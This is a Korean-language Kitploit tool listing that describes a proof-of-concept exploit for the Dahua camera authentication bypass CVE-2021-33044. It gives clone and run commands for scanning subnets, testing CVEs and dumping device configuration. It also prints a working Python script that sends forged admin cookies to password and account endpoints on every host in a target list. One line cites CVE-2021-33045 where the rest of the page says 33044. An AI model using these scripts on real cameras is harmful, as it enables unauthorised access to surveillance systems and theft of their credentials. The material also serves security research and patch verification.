Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
DAHUA_AUTH-BYPASS-CVE-2021-33044 — Dahua 인증 우회(CVE-2021-33044)에 대한 PoC 익스플로잇. 서브넷을 스캔하고, 여러 CVE를 테스트하며, 유효한 자격 증명 없이 조작된 쿠키를 통해 장치 구성을 덤프합니다. | Kitploit
도구/GitHubGitHub/eagle-nett/dahua_auth-bypass-cve-2021-33044
Authentication & AuthorizationIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubeagle-nett/dahua_auth-bypass-cve-2021-33044

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

DAHUA_AUTH-BYPASS-CVE-2021-33044

Dahua 인증 우회(CVE-2021-33044)에 대한 PoC 익스플로잇. 서브넷을 스캔하고, 여러 CVE를 테스트하며, 유효한 자격 증명 없이 조작된 쿠키를 통해 장치 구성을 덤프합니다.

저장소 보기
185개월 전아직 검토되지 않음

Dahua 인증 우회 PoC 모의 침투 (CVE-2021-33044)

개요

Dahua IP 카메라는 보안 감시 시스템에서 널리 사용되는 IoT 장치입니다. 내부 네트워크나 인터넷을 통해 자주 배포되므로 IP 카메라의 보안 취약점은 프라이버시와 정보 보안에 심각한 영향을 미칠 수 있습니다.

CVE-2021-33045는 일부 Dahua 카메라 모델에 존재하는 보안 취약점으로, 유효한 인증 없이 내부 구성 리소스에 무단으로 접근할 수 있습니다. 이 취약점은 장치 펌웨어의 취약한 접근 제어 메커니즘에서 비롯됩니다.

취약점 정보

항목내용
CVECVE-2021-33044
유형인증 우회
심각도치명적 (CVSS ~9.8)
인증인증 불필요
영향Dahua 카메라 / DVR / NVR

원인

취약점은 Dahua 카메라 펌웨어의 안전하지 않은 인증 설계에서 비롯됩니다.

  • 서버가 세션/토큰을 올바르게 확인하지 않음
  • 클라이언트가 보낸 데이터를 신뢰함
  • 일부 민감한 구성 엔드포인트는 쿠키 존재 여부만 확인하고 실제 접근 권한은 확인하지 않음

이로 인해 공격자는 다음과 같은 작업을 수행할 수 있습니다.

  • 인증 프로세스 위조
  • 로그인 완전 우회

참고:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

인증 우회 메커니즘 작동 방식

일반 흐름

root@kitploit:~
→ 클라이언트가 임의의 쿠키와 함께 HTTP 요청 전송
→ 카메라가 인터페이스 수준에서 쿠키 확인
→ 백엔드에서 유효한 세션을 확인하지 않음
→ 내부 구성 엔드포인트에 직접 접근 허용
→ 민감한 데이터 반환

시나리오

파일목적

사용 방법

설치

root@kitploit:~
# 저장소 클론
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

네트워크 스캔

root@kitploit:~
# 서브넷 스캔 (포트 필요)
python dahua_scanner.py https://example.com -p 80 8080 8800

# 포트를 지정한 단일 호스트
python dahua_scanner.py https://example.com

일반적인 Dahua 포트: 80,443, 8080, 37777, 37778

CVE 취약점 공격

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

인증 우회

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # 우회 후 장치 정보 덤프

예제

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

설명

  • 스크립트는 requests 라이브러리를 사용하며, SSL 경고를 비활성화하기 위해 적극적으로 SSL 경고를 끕니다.

  • dump_accounts(ip, port=80) 함수는 카메라 장치를 확인하는 주요 함수입니다. 함수의 주요 기능은 다음과 같습니다.

    • IP 주소와 포트로 URL 구성
    • 쿠키를 통해 관리자 로그인 상태 시뮬레이션
    • 민감한 구성 엔드포인트에 요청 전송
    • 응답을 분석하여 장치가 영향을 받는지 확인
  • 인증 쿠키 시뮬레이션. 함수는 다음과 같은 쿠키 값을 사용합니다.

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • 영향을 받는 카메라 버전에서는 백엔드가 실제 sessionID를 확인하지 않으므로 시스템이 요청이 유효한 관리자 계정에서 전송되었다고 신뢰합니다.

대상 목록 처리 루프

스크립트는 입력 파일에서 대상 목록을 읽고 각 장치에 대해 검사 함수를 순차적으로 호출합니다. 이 방식을 통해 여러 카메라를 자동으로 평가할 수 있습니다.

image

개발 과정

이 스크립트들은 다음을 기반으로 개발되었습니다.

  • NVD에서 공개된 CVE 세부 정보
  • Dahua 보안 공지
  • 공개 PoC 참고 자료 (seclists.org, packetstormsecurity)

테스트 상태:

  • 인증 우회 로직은 CVE 사양에 따라 구현됨
  • 취약한 장치에서 제한적으로 테스트됨

참고 사항

이 프로젝트는:

  • 학습 및 연구 목적으로만 사용
  • 개인 연구실 환경에서 실행하세요
도구 다운로드
CVE
dahua_scanner.py네트워크 검색 — 서브넷에서 Dahua 카메라 찾기탐지
dahua_exploit.py다중 CVE 스캐너 — 모든 보안 취약점 확인모두
dahua_auth_bypass.py전용 인증 우회 (--dump 옵션 포함)CVE-2021-33044